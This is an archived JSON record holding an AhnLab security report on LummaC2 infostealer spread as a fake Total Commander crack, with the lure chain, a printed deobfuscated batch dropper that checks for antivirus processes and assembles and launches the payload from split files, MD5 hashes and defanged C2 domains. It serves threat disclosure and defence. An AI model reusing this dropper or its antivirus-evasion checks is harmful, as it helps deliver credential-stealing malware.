{
	"id": "fbc5fb34-e9d9-41fe-b157-6ed328d4f87b",
	"created_at": "2026-04-06T03:36:32.767437Z",
	"updated_at": "2026-04-10T03:21:33.798495Z",
	"deleted_at": null,
	"sha1_hash": "1872e07b66933c89506007ffe760cb599a14c151",
	"title": "LummaC2 Malware Distributed Disguised as Total Commander Crack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4327510,
	"plain_text": "LummaC2 Malware Distributed Disguised as Total Commander\r\nCrack\r\nBy ATCP\r\nPublished: 2025-02-18 · Archived: 2026-04-06 03:20:30 UTC\r\nAhnLab SEcurity intelligence Center (ASEC) has discovered the LummaC2 malware being distributed disguised\r\nas the Total Commander tool. Total Commander is a file manager for Windows that supports various file formats.\r\nIt offers convenient file management features such as copy and move features, advanced search using strings\r\nwithin files, folder synchronization, and FTP/SFTP features. The tool offers one-month free trial, after which users\r\nare required to purchase a full version (license).\r\nhttps://asec.ahnlab.com/en/86435/\r\nPage 1 of 9\n\nFigure 1. Total Commander\r\nSearching “Total Commander Crack” on Google displays a post about downloading the crack version. Clicking on\r\nthe post connects to Google Colab drive and prompts the user to click the download button. Following the flow\r\nshown in Figure 2 to Figure 5, the user is led through multiple page transitions before finally arriving at the\r\nlocation where the threat actor has uploaded the file. These page transitions do not occur through automatic\r\nredirection, but rather require the user to read the posts and click on the links to download the malware disguised\r\nas a crack. This means that the attack specifically targeted users who intended to download the crack software.\r\nThe attack’s meticulous nature can be seen in the fact that the post and comments on the Reddit community about\r\nthe request for Total Commander crack version and the response included hyperlinks.\r\nhttps://asec.ahnlab.com/en/86435/\r\nPage 2 of 9\n\nFigure 2. Search result of “Total Commander Crack” on Google\r\nhttps://asec.ahnlab.com/en/86435/\r\nPage 3 of 9\n\nFigure 3. Download page 1 – Google Colab drive\r\nFigure 4. Page 2 of the Download Page – Disguised as a Reddit Post\r\nhttps://asec.ahnlab.com/en/86435/\r\nPage 4 of 9\n\nFigure 5. Download page 3 – Final download page\r\nThe ZIP file downloaded through the link has a double-compressed structure with an RAR file inside, and it is\r\npassword-protected.\r\nFigure 6. Compressed file being downloaded and its contents\r\nThe user is prompted to install the “installer_1.05_38.2.exe” file, which infects the system with LummaC2 when\r\nexecuted. This malware is a heavily obfuscated version of LummaC2 that has been compressed multiple times\r\nusing NSIS and AutoIt scripts. When executed, the NSIS script is the first to run. This script uses the ExecShell\r\ncommand to execute a batch script via cmd. The highlighted part in Figure 7 shows how a variable is inserted into\r\nthe middle of a string. When the value of the variable is inserted at runtime, the following command is executed.\r\nExecShell open cmd “/c copy Nv Nv.cmd \u0026 Nv.cmd\r\nhttps://asec.ahnlab.com/en/86435/\r\nPage 5 of 9\n\nFigure 7. NSIS script\r\nThe Batch script is obfuscated as shown below. It involves storing characters in variables and inserting these\r\nvariables in the middle of commands. Additionally, meaningless strings are added in the middle of the commands\r\nto make the script harder to understand.\r\nFigure 8. Nv.cmd (Batch script)\r\nThe deobfuscated script is shown below, and it can be seen that the script is relatively short.\r\nSet VOqMytMZEmITmzXaSwyTLVZwsCxvDeT=Olympic.com\r\nSet RRddJNCtGgRY=\r\nSet FThiSRhhaXuEMFetxlGlyEUpdIbYBdqZFoz=5\r\ntasklist | findstr /I \"opssvc wrsa\" \u0026 if not errorlevel 1 ping -n 194 127.0.0.1\r\nSet /a Fires=363926\r\ntasklist | findstr \"AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth\" \u0026 if not errorlevel 1 Set VOqMytMZEm\r\ncmd /c md Fires\r\nextrac32 /Y /E Schools\r\n\u003cnul set /p =\"MZ\" \u003e Fires\\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT\r\nfindstr /V \"LIL\" Cir \u003e\u003e Fires\\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT\r\ncmd /c copy /b Fires\\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT + Religion + Consisting + Stuart + Police + Turns + Constit\r\ncd Fires\r\ncmd /c copy /b ..\\Hebrew + ..\\Fla + ..\\Mtv + ..\\Novel + ..\\Suffer + ..\\Update + ..\\Msn NRRddJNCtGgRY\r\nhttps://asec.ahnlab.com/en/86435/\r\nPage 6 of 9\n\nstart VOqMytMZEmITmzXaSwyTLVZwsCxvDeT NRRddJNCtGgRY\r\ncd ..\r\nchoice /d y /t FThiSRhhaXuEMFetxlGlyEUpdIbYBdqZFoz\r\nThe analysis result shows that a normal AutoIt executable (Runner) and a compiled AutoIt (.a3x) script are\r\nexecuted. The cmd file executed by NSIS upon initial execution is a single file, and the .a3x script and the AutoIt\r\nexecutable that acts as a runner to execute the script are divided into multiple files. Refer to Figure 9 below to see\r\nhow the files are divided.\r\nFigure 9. Divided binary file\r\nThe LummaC2 malware that is ultimately executed is encrypted within the .a3x file, as shown in Figure 10. It is\r\ndecrypted at the time of execution and loaded into the memory. Both the encrypted malware binary and the\r\nshellcode that decompresses and loads it are included within the AutoIt script. This method of wrapping malware\r\nin an AutoIt script is commonly used by threat actors. For more information on this technique, please refer to the\r\nfollowing posts: [1][2]\r\nhttps://asec.ahnlab.com/en/86435/\r\nPage 7 of 9\n\nFigure 10. Script decompiled from the .a3x file\r\nLummaC2 is an information-stealing malware that has been actively distributed since early 2023. It is mainly\r\ndisguised as illegal programs such as cracks and serials. When a system is infected with LummaC2, sensitive\r\ninformation such as browser-stored account credentials, email credentials, cryptocurrency wallet credentials, and\r\nauto-login program credentials are sent to the threat actor’s C\u0026C server. The stolen information may be traded in\r\nthe dark web or used in secondary attacks, causing additional harm. There have been continuous reports of data\r\nbreaches where the theft of information from a personal PC led to an attack on the corporate system. For more\r\ninformation on LummaC2, please refer to the following posts: [3], [4], [5], [6], and [7].\r\nIt is recommended to download software only from official distribution sites. Extra caution is advised when using\r\nsoftware from unknown sources.\r\nMD5\r\n0a2d4bbb5237add913a2c6cf24c08688\r\n0da35eeccb9746a77d6b20dfdd01e1e1\r\n12087e91e60f195b2bc69b819978690e\r\n1f13356efe44af196602fc3438889d16\r\n25728e657a3386c5bed9ae133613d660\r\nAdditional IOCs are available on AhnLab TIP.\r\nhttps://asec.ahnlab.com/en/86435/\r\nPage 8 of 9\n\nURL\r\nhttp[:]//affordtempyo[.]biz/\r\nhttp[:]//hoursuhouy[.]biz/\r\nhttp[:]//impolitewearr[.]biz/\r\nhttp[:]//lightdeerysua[.]biz/\r\nhttp[:]//mixedrecipew[.]biz/\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/86435/\r\nhttps://asec.ahnlab.com/en/86435/\r\nPage 9 of 9\n\n  https://asec.ahnlab.com/en/86435/ \nFigure 3. Download page 1-Google Colab drive \nFigure 4. Page 2 of the Download Page-Disguised as a Reddit Post\n   Page 4 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/86435/"
	],
	"report_names": [
		"86435"
	],
	"threat_actors": [],
	"ts_created_at": 1775446592,
	"ts_updated_at": 1775791293,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1872e07b66933c89506007ffe760cb599a14c151.pdf",
		"text": "https://archive.orkl.eu/1872e07b66933c89506007ffe760cb599a14c151.txt",
		"img": "https://archive.orkl.eu/1872e07b66933c89506007ffe760cb599a14c151.jpg"
	}
}